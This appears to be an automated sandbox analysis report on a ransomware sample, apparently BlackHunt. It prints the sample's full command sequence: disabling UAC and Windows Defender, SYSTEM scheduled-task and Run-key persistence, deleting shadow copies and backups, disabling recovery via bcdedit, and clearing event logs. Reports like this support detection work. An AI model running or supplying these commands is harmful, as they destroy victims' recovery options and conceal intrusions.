description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe"C:\Users\Admin\AppData\Local\Temp\626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2836 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2592
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1676
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2020
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2152
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2004
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1540
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2500
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2916
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2396
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2364
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2840
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2092
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1480
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1400
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2112
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2980
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe" /F2⤵PID:1260
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe" /F3⤵
- Creates scheduled task(s)
PID:2420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:312
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1036
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2260
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1076
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1088
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1536
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1404
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2280
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:344
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1648
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:860
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1276
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2404
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1400
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
PID:1912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2816
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1968
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
PID:2572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2000
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1008
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
PID:2060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2940
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2708
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2136
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2420
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2036
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2688
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3008
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:860
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1040
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD588ca1b72c58f6117e6c480eaa9fcd8f5
SHA15ab9e82d96aabec71cc1aaeb1b2df754f1972824
SHA256680844cd1a453ed7b7c81719727b0c3c5e74e0bfeb8f1808ad2abdd160aa5e82
SHA512ac1816e19be29363945a4652c44387986e6440cf13bdb861620f7e34e0dac8dbc08311f152bb00973bb6ec283f456e4eb65010dea17a9690b2eec052116f5ebc
-
Filesize
684B
MD5536b82d2bf3bc5c9f8334e8c7cff789c
SHA1508c42447bb3632987b01d9180adc916e646c19f
SHA2564a0aa0808fda3bdde4751c89d3165e36f825629c5c4a55af0696c7c3a9e73974
SHA512736ed28f43800c4194421f4055cef1bb83cb80ce3334afd5bf125131189dd991e6d496e4b338a3fe3591b9126ef789c0d7baf4c05ce3c992043914624e00cd06
-
Filesize
1KB
MD5a2a7bd0ff849e137f9b9a78847e05e73
SHA1d8d4468d1d9e24bc6b4761c3e059b620543c2df7
SHA256c847232ec08e443bd09c8ffe65f483e0386e3511e0020dffc1425f738fb7c78e
SHA512fd5c75a50a04d311aebcb41e61a7945b8596752dbee4c3c7e91e33c98d0b5418c3fccf81781d6ea46bde3b3ca8e9601f540826d7a42a213622a99d9ad9a96571